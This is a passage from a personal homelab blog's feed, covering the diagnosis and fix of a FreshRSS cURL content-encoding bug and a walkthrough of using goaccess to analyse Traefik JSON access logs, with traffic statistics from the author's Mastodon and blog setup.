</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -e TZ<span style="color:#f92672">=</span>Europe/Paris<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -e <span style="color:#e6db74">&#39;CRON_MIN=1,31&#39;</span><span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -v <span style="color:#66d9ef">$(</span>pwd<span style="color:#66d9ef">)</span>:/var/www/FreshRSS<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -v freshrss_data:/var/www/FreshRSS/data<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  --name freshrss<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  freshrss/freshrss:edge
</span></span></code></pre></div><p>I don&rsquo;t speak PHP at all, but I was still able to litter a few print statements
around the code, and finally figured out that after trying to fetch the <code>index.xml</code>,
the body of the response was indeed empty. That&rsquo;s why the initial attempt said
that there was no feed found, and why the attempt with <code>#force_feed</code> showed an
<code>Empty Body</code> issue.</p>
<p>Then I looked at the actual fetching code <a href="https://github.com/FreshRSS/FreshRSS/blob/fdd82820f16733b6e07def5b590fd94879e5a520/lib/simplepie/simplepie/src/File.php#L89">here</a>. The interesting part was <a href="https://github.com/FreshRSS/FreshRSS/blob/fdd82820f16733b6e07def5b590fd94879e5a520/lib/simplepie/simplepie/src/File.php#L146-L154">this</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php5" data-lang="php5"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">curl_errno</span>($fp) <span style="color:#f92672">===</span> <span style="color:#a6e22e">CURLE_WRITE_ERROR</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">curl_errno</span>($fp) <span style="color:#f92672">===</span> <span style="color:#a6e22e">CURLE_BAD_CONTENT_ENCODING</span>) {
</span></span><span style="display:flex;"><span>    $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">error</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;cURL error &#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">curl_errno</span>($fp) <span style="color:#f92672">.</span> <span style="color:#e6db74">&#39;: &#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">curl_error</span>($fp); <span style="color:#75715e">// FreshRSS
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">on_http_response</span>($responseBody <span style="color:#f92672">===</span> <span style="color:#66d9ef">false</span> <span style="color:#f92672">?</span> <span style="color:#66d9ef">false</span> <span style="color:#f92672">:</span> $responseHeaders <span style="color:#f92672">.</span> $responseBody, $curl_options);
</span></span><span style="display:flex;"><span>    $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">error</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">null</span>; <span style="color:#75715e">// FreshRSS
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#a6e22e">curl_setopt</span>($fp, <span style="color:#a6e22e">CURLOPT_ENCODING</span>, <span style="color:#e6db74">&#39;none&#39;</span>);
</span></span><span style="display:flex;"><span>    $responseHeaders <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>;
</span></span><span style="display:flex;"><span>    $responseBody <span style="color:#f92672">=</span> <span style="color:#a6e22e">curl_exec</span>($fp);
</span></span><span style="display:flex;"><span>    $responseHeaders <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>In my tests, FreshRSS runs into this <code>if</code> condition, with the <code>CURLE_BAD_CONTENT_ENCODING</code>.
Printing the <code>$this-&gt;error</code> value gives this result:</p>
<pre tabindex="0"><code>cURL error 61: Unrecognized content encoding type. libcurl understands deflate, gzip, br, zstd content encodings
</code></pre><p>Checking further and printing the <code>$responseHeaders</code> value as well shows that
<code>Content-Encoding</code> header is set here as well:</p>
<pre tabindex="0"><code>HTTP/2 200
accept-ranges: bytes
content-encoding: aws-chunked
content-type: application/rss+xml
date: Tue, 30 Dec 2025 22:50:37 GMT
etag: &#34;xxx&#34;
last-modified: Sat, 13 Dec 2025 21:23:42 GMT
server: Ceph Object Gateway (squid)
x-amz-meta-md5chksum: xxx
content-length: 11242
</code></pre><p>The original intention of this code seemed to be to disable <code>content-encoding</code>
in case there was an encoding error. And the expectation was that that the second
<code>curl_exec</code> call would then be successful. But it just returned the same error
again, and importantly, did not set the body. But crucially to the rest of the
fetching code, it still stores the HTTP return code - which was &ldquo;200&rdquo;. So all
following code assumed that the fetch was successful.</p>
<p>Then I looked at the documentation for the <code>CURLOPT_ENCODING</code> option, which is
set to <code>'none'</code> in the above code. And I found that it was obsoleted by the
<a href="https://curl.se/libcurl/c/CURLOPT_ACCEPT_ENCODING.html">CURLOPT_ACCEPT_ENCODING option</a>
a long time ago. And that <code>'none'</code> wasn&rsquo;t actually a valid value. When this option
is set, cURL will always try to decompress the response, as it will always
assume that it needs to. But also always checks whether it actually has support
for the <code>Content-Encoding</code> value in the response. And if it doesn&rsquo;t it shows the
above error.</p>
<p>But it looked to me like FreshRSS already had this specific branch of the code
to handle specifically this issue, but it did not work (anymore?). Reading through
the option&rsquo;s docs, it seemed that it instead needed <code>null</code> to be set to completely
disable the handling. So I changed the <code>CURLOPT_ENCODING</code> option to be set to
<code>null</code> instead of <code>'none'</code>. And now the feed was added without any issue.</p>
<p>Open source is an absolutely amazing thing.</p>
<p>I also created a ticket on FreshRSS <a href="https://github.com/FreshRSS/FreshRSS/issues/8374">here</a>,
and my fix has already been merged and should find its way into the next FreshRSS
release.</p>
<p>That was a very satisfying investigation. &#x1f642;</p>
<p>Concerning the actual issue with sending the header: After some discussion with
the author of the blog, we were able to figure out that the one difference in
our setup is that I&rsquo;m using <code>s3cmd</code> to push the files generated by Hugo to the
S3 bucket. They&rsquo;re using Hugo&rsquo;s <a href="https://gohugo.io/host-and-deploy/deploy-with-hugo-deploy/">deploy</a>
feature. As best as we could figure out, the AWS SDK used by Hugo automatically
sets the header when pushing to a bucket. AWS S3 then just uses the header during
the PUT operation, but doesn&rsquo;t store the fact that the header was set. So it will
not be returned as part of a response. But Ceph S3 seems to be set up differently,
and when the <code>Content-Encoding</code> header is set during the push, it will also
return it as part of the response to a GET request.</p>
<p>And that&rsquo;s it for this one. I hope you all made it safely into 2026, and I
wish you all a happy new year. &#x1f642;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Goaccess: A CLI Tool for Webserver Access Log Analysis</title>
      <link>https://blog.mei-home.net/posts/go-access/</link>
      <pubDate>Sat, 03 Jan 2026 12:50:10 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/go-access/</guid>
      <description>A short one about a small CLI tool for analyzing access logs of webservers in the terminal</description>
      <content:encoded><![CDATA[<p>Wherein I talk about a small tool for access log analysis on the terminal.</p>
<p>I recently re-discovered a small tool I already came across a while ago, but never
wrote a post about: <a href="https://goaccess.io/">Goaccess</a>. It&rsquo;s a command line tool
which can be used to do quick analysis of web server access logs. It understands
some of the standard formats from e.g. Apache out of the box, but also provides
facilities to parse other log formats. In this post, I will use it to parse 30 GB
worth of logs from my public-facing Traefik instance and see what I can get out
of it.</p>
<p>The first step was getting the Traefik logs. While I do also have them in my
Loki instance, those are only the ones from the last year. But it turns out
that I never deleted the logs on the host. &#x1f926; Luckily it has a large enough
disk. I ended up with 30 GB of logs, ranging from March 2023 to December 2025.</p>
<p>Before showing you the results, one weird thing while copying the file to my
laptop: It was incredibly slow. Sure, it was 30 GB worth of logs, but I was
sitting behind a 1 Gbps connection. And with my upload at home, it was only
coming down the pipe with a bit over 5 MB/s. I tried to figure out why. No internal
network connection in the Homelab was overloaded. Neither was the CPU of the Pi
I was copying the file from. And only just now, as I&rsquo;m typing this, am I realizing
that it&rsquo;s not some SSH/rsync inefficiency or the slow Pi 4 CPU. No, it&rsquo;s of course
my network connection back home. That&rsquo;s not a 1 Gbps, but rather 250 Mbps down
and - you probably guessed it already - 40 Mbps up. &#x1f926;
So absolutely nothing wrong with that at all. I was just being a bit thick for
a moment there.</p>
<p>The first issue I had was how to parse the logs, as I had configured JSON output
for my Traefik instance, and all the pre-configured log formats are standard
line formats, not JSON. But after a bit of googling, I came across <a href="https://github.com/allinurl/goaccess/issues/2757">this GitHub issue</a>,
more specifically, <a href="https://github.com/allinurl/goaccess/issues/2757#issuecomment-2508053539">this comment</a>.
It showed how to set up goaccess&rsquo; <a href="https://goaccess.io/man#custom-log">log-format option</a>
to work with Traefik&rsquo;s JSON output format. Here&rsquo;s an example log line:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#ae81ff">2023-03-02</span><span style="color:#960050;background-color:#1e0010">T</span><span style="color:#ae81ff">22</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#ae81ff">22</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#ae81ff">0</span><span style="color:#ae81ff">7.136593921</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#ae81ff">01</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#ae81ff">00</span> <span style="color:#960050;background-color:#1e0010">stdout</span> <span style="color:#960050;background-color:#1e0010">F</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientAddr&#34;</span>:<span style="color:#e6db74">&#34;10.88.0.1:55130&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientHost&#34;</span>:<span style="color:#e6db74">&#34;10.88.0.1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientPort&#34;</span>:<span style="color:#e6db74">&#34;55130&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientUsername&#34;</span>:<span style="color:#e6db74">&#34;-&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;DownstreamContentSize&#34;</span>:<span style="color:#ae81ff">19</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;DownstreamStatus&#34;</span>:<span style="color:#ae81ff">404</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Duration&#34;</span>:<span style="color:#ae81ff">149256</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Overhead&#34;</span>:<span style="color:#ae81ff">149256</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestAddr&#34;</span>:<span style="color:#e6db74">&#34;127.0.0.1:443&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestContentSize&#34;</span>:<span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestCount&#34;</span>:<span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestHost&#34;</span>:<span style="color:#e6db74">&#34;127.0.0.1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestMethod&#34;</span>:<span style="color:#e6db74">&#34;GET&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestPath&#34;</span>:<span style="color:#e6db74">&#34;/&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestPort&#34;</span>:<span style="color:#e6db74">&#34;443&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestProtocol&#34;</span>:<span style="color:#e6db74">&#34;HTTP/1.1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestScheme&#34;</span>:<span style="color:#e6db74">&#34;http&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RetryAttempts&#34;</span>:<span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;StartLocal&#34;</span>:<span style="color:#e6db74">&#34;2023-03-02T22:22:07.136056394+01:00&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;StartUTC&#34;</span>:<span style="color:#e6db74">&#34;2023-03-02T21:22:07.136056394Z&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;request_User-Agent&#34;</span>:<span style="color:#e6db74">&#34;curl/7.81.0&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2023-03-02T22:22:07+01:00&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The first issue to solve was the prefix added by Podman because that&rsquo;s where the
Traefik server is running. Another is that the log is mixed, so it doesn&rsquo;t just
contain access log lines like the above, but also other messages from Traefik.
I&rsquo;m working with the following to get only the access logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>grep -a <span style="color:#e6db74">&#34;ClientAddr&#34;</span> traefik.log | cut -d <span style="color:#e6db74">&#39; &#39;</span> -f4- &gt; cleaned.log
</span></span></code></pre></div><p>Here, <code>traefik.log</code> is the original log file. I&rsquo;m filtering for lines with <code>ClientAddr</code>,
which will be the access logs. And I&rsquo;m taking only the fourth field, to only get
the actual access log, not Podman&rsquo;s prefix. The <code>-</code> at the end of <code>-f4-</code> is
load bearing. It is needed so that it stops splitting the line by the given
delimiter and outputs the whole rest of the line starting with field 4. Without
this, user agent strings with spaces in them will be cut off, so that the
access log part of the line will be incomplete, lacking the final <code>time</code> member
and the closing brace.</p>
<p>With that done, here is the command for analyzing the resulting logs with
goaccess:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>goaccess --jobs <span style="color:#ae81ff">8</span> --log-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{&#34;ClientHost&#34;: &#34;%h&#34;, &#34;ClientUsername&#34;: &#34;%e&#34;, &#34;DownstreamContentSize&#34;: &#34;%b&#34;, &#34;DownstreamStatus&#34;: &#34;%s&#34;, &#34;Duration&#34;: &#34;%n&#34;, &#34;RequestHost&#34;: &#34;%v&#34;, &#34;RequestMethod&#34;: &#34;%m&#34;, &#34;RequestPath&#34;: &#34;%U&#34;, &#34;RequestProtocol&#34;: &#34;%H&#34;, &#34;request_Referer&#34;:&#34;%R&#34;, &#34;request_User-Agent&#34;:&#34;%u&#34;, &#34;time&#34;: &#34;%dT%t&#34;}&#39;</span> --date-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%Y-%m-%d&#39;</span> --time-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%T%z&#39;</span> cleaned.log
</span></span></code></pre></div><p>Running that command will analyze the log file in its entirety and then show
goaccess&rsquo; ncurses UI:</p>
<figure>
    <img loading="lazy" src="dashboard.png"
         alt="A screenshot of the goaccess terminal UI. Here, I will only provide an overview of the goaccess UI and what&#39;s shown in it. I will properly show and discuss my own data later in this post. At the top, it shows a number of general statistics, including for example the fact that it read 28 million requests, for 484k different files, with a total transfer amount of 732 GB. Next come multiple sections with data tables. The first one is the number of unique visitors per day. It shows the days sorted chronologically, showing the 7 most recent days, from 2025-12-27 with only 850 hits and 253 visitors down to 2025-12-21, with 31199 hits and 3042 visitors. Next come the requested files. This time, the table is ordered by number of hits. The most hit URL, with 8.9 million hits, is /inbox, which is part of the Mastodon API. Next comes &#39;/&#39;, with 2.7 million hits. At the bottom, it shows &#39;/users/mmeier&#39;, again from the Mastodon API, with 462k hits. After this table follows the &#39;Static Requests&#39; one, which specifically shows results for static files like figures, CSS or JS files. Here, the dominant file is the png for my Mastodon profile picture, with 76k requests. The last visible table is the &#39;Not found URLs&#39; table, which shows that 35k hits tried to visit &#39;/&#39;, but got a 404 for their troubles."/> <figcaption>
            <p>Top of the goaccess ncurses UI</p>
        </figcaption>
</figure>

<p>The next page looks like this:
<figure>
    <img loading="lazy" src="dashboard-second-page.png"
         alt="A continuation of the previous screenshot, now showing the next few sections. The first one visible is the &#39;Visitor Hostnames and IPs&#39; section. It clearly shows that my internal usage dominates. The top IP is &#39;10.86.1.60&#39;, which is my desktop machine. It accounts for 3.5 million hits, 12% of the total. A lot of the other 6 IPs shown are also local network IPs from the 10.86.0.0/16 range. Then comes the operating systems table, showing that 30% of my hits are coming from Unix-like systems. Then come the browsers, where Feeds is at the top. I will explain the meaning here a bit more in the next section. The last table only half-visible, is &#39;Time distribution&#39;, which shows when most hits arrive. It is again sorted chronologically, showing that 5.2%, or 1.4 million hits, come in between 00:00 and 01:00, UTC."/> <figcaption>
            <p>The next set of sections in the goaccess UI.</p>
        </figcaption>
</figure>
</p>
<p>And finally, here is the final set of tables:
<figure>
    <img loading="lazy" src="dashboard-page-three.png"
         alt="A continuation of the previous screenshots, now showing the last few tables. The first one is the &#39;Virtual hosts&#39; table. It shows that the majority of hits, 18 million or 63% of the total, went to my Mastodon instance at social.mei-home.net. Followed by my Nextcloud instance at cloud.mei-home.net. Then comes the &#39;Referring Sites&#39; table, which is completely empty. It&#39;s followed by the &#39;HTTP Status Codes&#39; table, which is topped by 92.78% of all requests which got a 2xx status code. another 4.2% were client errors. The final section is &#39;Remote User (HTTP Authentication)&#39;. It shows only &#39;-&#39; with 99.96%. I cut out the remaining lines, as they would show valid usernames in my infrastructure."/> <figcaption>
            <p>The final set of sections in the UI.</p>
        </figcaption>
</figure>
</p>
<p>In the above screenshot, the &ldquo;Referring Sites&rdquo; table is entirely empty, as I&rsquo;m
not logging any referrers.</p>
<p>In addition to the ability of showing an interactive ncurses interface like this,
goaccess also has the ability to generate an HTML version of the analysis, which
looks like this:
<figure>
    <img loading="lazy" src="html-report-example.png"
         alt="Another screenshot, this time of a browser window. The opened page shows a few stats at the top, namely exactly the same values as were at the top of the terminal UI, e.g. Failed Requests or Unique visitors. Below those stats are then the same sections as before. But where the terminal UI only had tables with the data, the HTML variant has charts as well."/> <figcaption>
            <p>The HTML variant of the report. The main difference is that the HTML version is able to show charts in addition to tables.</p>
        </figcaption>
</figure>
</p>
<p>There&rsquo;s one more feature before I&rsquo;d like to get to my own data: Storing and re-using
results. Although to be honest, I&rsquo;m not really sure how useful it is. With this
feature, the preprocessed data can be stored on disk, so that the next invocation
of goaccess doesn&rsquo;t need to parse all of the logs again. On my laptop, running a
8 core AMD Ryzen 4900HS, with the &ldquo;-j 8&rdquo; option I showed above, takes about
250 seconds to churn through 28 million requests in a 30 GB log file. To store
the data in a database, append <code>--persist --db-path /some/dir</code> to the goaccess
invocation. This will store the analyzed data. It can then be re-used with a
command like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>goaccess --jobs <span style="color:#ae81ff">8</span> --log-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{&#34;ClientHost&#34;: &#34;%h&#34;, &#34;ClientUsername&#34;: &#34;%e&#34;, &#34;DownstreamContentSize&#34;: &#34;%b&#34;, &#34;DownstreamStatus&#34;: &#34;%s&#34;, &#34;Duration&#34;: &#34;%n&#34;, &#34;RequestHost&#34;: &#34;%v&#34;, &#34;RequestMethod&#34;: &#34;%m&#34;, &#34;RequestPath&#34;: &#34;%U&#34;, &#34;RequestProtocol&#34;: &#34;%H&#34;, &#34;request_Referer&#34;:&#34;%R&#34;, &#34;request_User-Agent&#34;:&#34;%u&#34;, &#34;time&#34;: &#34;%dT%t&#34;}&#39;</span> --date-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%Y-%m-%d&#39;</span> --time-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%T%z&#39;</span> --db-path /some/path --restore
</span></span></code></pre></div><p>Initially, I was missing the <code>-</code> at the end of the <code>cut -d ' ' -f4-</code> part of my
extraction command, which lead to the JSON logs being cut off due to spaces in
the user agent string. The result was that the overwhelming majority of logs were
rejected by goaccess. To analyze the issue, you can add the option <code>--invalid-requests=./invalid.log</code>
to the command. All rejected log lines will be written into that file.</p>
<p>And finally, I would advise working with the commands as I&rsquo;ve given them here,
first filtering the log lines, writing them into a new file and then providing
that file to the goaccess invocation. Do not do this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>grep -a <span style="color:#e6db74">&#34;ClientAddr&#34;</span> traefik.log | cut -d <span style="color:#e6db74">&#39; &#39;</span> -f4- &gt; cleaned.log | goaccess...
</span></span></code></pre></div><p>I found that this is rather slow, when compared to providing a pre-filtered file.</p>
<h2 id="analyzing-my-data-a-bit">Analyzing my data a bit</h2>
<p>With the tool&rsquo;s basic functionality out of the way, let&rsquo;s have a closer look at
my data. For a bit of context, the Traefik instance this data is coming from is
not my Kubernetes Ingress Controller instance. Instead, this is the instance
fronting external access. Everything that comes in from the public internet goes
through this Traefik instance, running on a mostly firewalled-off Pi. There&rsquo;s
still some internal traffic going through there as well though, as I&rsquo;m also
pointing the internal DNS for those publicly visible services to this &ldquo;bastion&rdquo;
Traefik instance instead of the k8s Ingress. I mostly do this to have an easy
way to make sure my public facing stuff actually works.</p>
<p>I created the data from a Traefik JSON log file pre-filtered to contain only the access
logs like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>goaccess --jobs <span style="color:#ae81ff">12</span> --log-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{&#34;ClientHost&#34;: &#34;%h&#34;, &#34;ClientUsername&#34;: &#34;%e&#34;, &#34;DownstreamContentSize&#34;: &#34;%b&#34;, &#34;DownstreamStatus&#34;: &#34;%s&#34;, &#34;Duration&#34;: &#34;%n&#34;, &#34;RequestHost&#34;: &#34;%v&#34;, &#34;RequestMethod&#34;: &#34;%m&#34;, &#34;RequestPath&#34;: &#34;%U&#34;, &#34;RequestProtocol&#34;: &#34;%H&#34;, &#34;request_Referer&#34;:&#34;%R&#34;, &#34;request_User-Agent&#34;:&#34;%u&#34;, &#34;time&#34;: &#34;%dT%t&#34;}&#39;</span> --date-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%Y-%m-%d&#39;</span> --time-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%T%z&#39;</span> --invalid-requests<span style="color:#f92672">=</span>./invalid.log --unknowns-log<span style="color:#f92672">=</span>./unknowns.log -e 10.0.0.0-10.255.255.255 -r
</span></span></code></pre></div><p>The change in the <code>--jobs</code> value comes from the fact that I&rsquo;m back home now and
on my beefier desktop machine. I&rsquo;m also providing two additional files for goaccess
to write problematic logs to. The <code>--invalid-requests</code> option directs log lines
which goaccess couldn&rsquo;t parse to a separate file. The <code>--unknowns-log</code> redirects
unknown user agents into a separate file. In my case, those are mostly Prometheus
and Uptime-Kuma, as well as Gatus and a number of Fediverse servers.
Finally, I&rsquo;m also excluding my local IP range, with <code>-e 10.0.0.0-10.255.255.255</code>.
That&rsquo;s because for this analysis, I was only interested in external traffic.</p>
<p>The finished analysis shows a total of 28 million requests, ranging from
2023-03-04 to 2025-12-27. About eight million of those are for local access, so
they got excluded from the rest of the analysis. Only 1469 logs were unparsable.</p>
<p>Here is the table by visitors, which goaccess computes with combination of user
agent and source IP:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Visitors</th>
          <th style="text-align: right">Percentage of Total Visitors</th>
          <th style="text-align: right">Requests</th>
          <th style="text-align: right">Transferred Data</th>
          <th style="text-align: right">Day</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">7746</td>
          <td style="text-align: right">0.40%</td>
          <td style="text-align: right">30492</td>
          <td style="text-align: right">257 MiB</td>
          <td style="text-align: right">2025-11-22</td>
      </tr>
      <tr>
          <td style="text-align: right">7483</td>
          <td style="text-align: right">0.38%</td>
          <td style="text-align: right">26523</td>
          <td style="text-align: right">388 MiB</td>
          <td style="text-align: right">2025-11-27</td>
      </tr>
      <tr>
          <td style="text-align: right">7162</td>
          <td style="text-align: right">0.37%</td>
          <td style="text-align: right">27083</td>
          <td style="text-align: right">240 MiB</td>
          <td style="text-align: right">2025-11-21</td>
      </tr>
      <tr>
          <td style="text-align: right">7126</td>
          <td style="text-align: right">0.37%</td>
          <td style="text-align: right">26839</td>
          <td style="text-align: right">283 MiB</td>
          <td style="text-align: right">2025-11-26</td>
      </tr>
      <tr>
          <td style="text-align: right">7081</td>
          <td style="text-align: right">0.36%</td>
          <td style="text-align: right">46890</td>
          <td style="text-align: right">442 MiB</td>
          <td style="text-align: right">2025-10-05</td>
      </tr>
      <tr>
          <td style="text-align: right">6550</td>
          <td style="text-align: right">0.34%</td>
          <td style="text-align: right">26169</td>
          <td style="text-align: right">356 MiB</td>
          <td style="text-align: right">2025-11-20</td>
      </tr>
      <tr>
          <td style="text-align: right">5649</td>
          <td style="text-align: right">0.29%</td>
          <td style="text-align: right">42871</td>
          <td style="text-align: right">616 MiB</td>
          <td style="text-align: right">2025-12-02</td>
      </tr>
  </tbody>
</table>
<p>So there&rsquo;s a lot more hits coming per visitor, which makes sense: The data does
contain both my blog and my Mastodon instance. And the Mastodon instance likely
has relatively few visitors, but a lot of requests. Overall, there also doesn&rsquo;t
seem to be that much variation, at least not at the top. What is interesting
in this table is the variation in the transmitted amount of data. I would
have expected that to be relatively stable day-to-day, with perhaps a bit more
traffic on days where I post a few screenshots of Grafana graphs, or a particularly
chart-heavy blog post? I tried to figure out what I might have done on 2025-12-02,
but I neither posted a picture on Mastodon nor a blog post.</p>
<p>Sorting that section by the TX data, 2025-05-01 is at the top, with over 30 GiB
transferred. I grepped for &ldquo;2025-05-01&rdquo; in the log and then piped the result
into goaccess again, and that was the day I switched my k8s control plane nodes
to Pi 5, and posted a few pictures on Mastodon. Specifically, <a href="https://social.mei-home.net/@mmeier/114431345389666115">this thread</a>.</p>
<p>Next up, requested files/URLs, sorted by number of hits:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Hits</th>
          <th style="text-align: right">Percentage of Total Hits</th>
          <th style="text-align: right">Transmitted Data</th>
          <th>URL</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">8963559</td>
          <td style="text-align: right">44.13%</td>
          <td style="text-align: right">2 MiB</td>
          <td><code>/inbox</code></td>
      </tr>
      <tr>
          <td style="text-align: right">462035</td>
          <td style="text-align: right">2.27%</td>
          <td style="text-align: right">901 MiB</td>
          <td><code>/user/mmeier</code></td>
      </tr>
      <tr>
          <td style="text-align: right">443268</td>
          <td style="text-align: right">2.18%</td>
          <td style="text-align: right">250 MiB</td>
          <td><code>/.well-known/webfinger?resource=acct:mmeier@social.mei-home.net</code></td>
      </tr>
      <tr>
          <td style="text-align: right">397849</td>
          <td style="text-align: right">1.96%</td>
          <td style="text-align: right">2670 MiB</td>
          <td><code>/</code></td>
      </tr>
      <tr>
          <td style="text-align: right">358815</td>
          <td style="text-align: right">1.77%</td>
          <td style="text-align: right">60 MiB</td>
          <td><code>/users/mmeier/collections/featured</code></td>
      </tr>
      <tr>
          <td style="text-align: right">343021</td>
          <td style="text-align: right">1.57%</td>
          <td style="text-align: right">789 MiB</td>
          <td><code>/index.xml</code></td>
      </tr>
      <tr>
          <td style="text-align: right">319137</td>
          <td style="text-align: right">1.57%</td>
          <td style="text-align: right">64 MiB</td>
          <td><code>/users/mmeier/following</code></td>
      </tr>
  </tbody>
</table>
<p>Those are obviously dominated by my Mastodon instance, with <code>POST</code> requests to
the inbox accounting for almost half of all requests which reached my Homelab
from external sources. The only non-Mastodon URLs are the <code>index.xml</code>, which is
from my blog, and possibly <code>/</code>. But the <code>/</code> might be either Mastodon or the blog.
I&rsquo;m also assuming that the <code>/index.xml</code> will likely dominate in the future, as
I switched to providing full text in my RSS feed a little while ago.</p>
<p>Next is a specific section for 404&rsquo;s, but that&rsquo;s not too interesting, because it&rsquo;s
just a lot of Mastodon API data endpoints, and I disabled those.</p>
<p>Then come the visitor&rsquo;s IPs. I won&rsquo;t post the entire table, as it&rsquo;s not too
useful I think, but there was something worth mentioning: Over the entire
timeframe, a whole 8.83% of requests came from one IP, <code>38.242.251.94</code>. I first
thought that&rsquo;s a crawler of some sort, but it turns out that that&rsquo;s a Fediverse
instance. Specifically, the PeerTube instance <a href="https://tilvids.com">tilvids.com</a>.
Filtering only for that URL, 99% of requests are for <code>/inbox</code>. I got curious and
started asking around whether PeerTube instances are particularly talkative.
Because I&rsquo;m following only a few channels on that instance, which don&rsquo;t post
that much. But it&rsquo;s still showing up a lot more than e.g. mastodon.social, where
I&rsquo;m following a lot more people.
Sadly, at the time of writing, there were no responses. I can only assume that
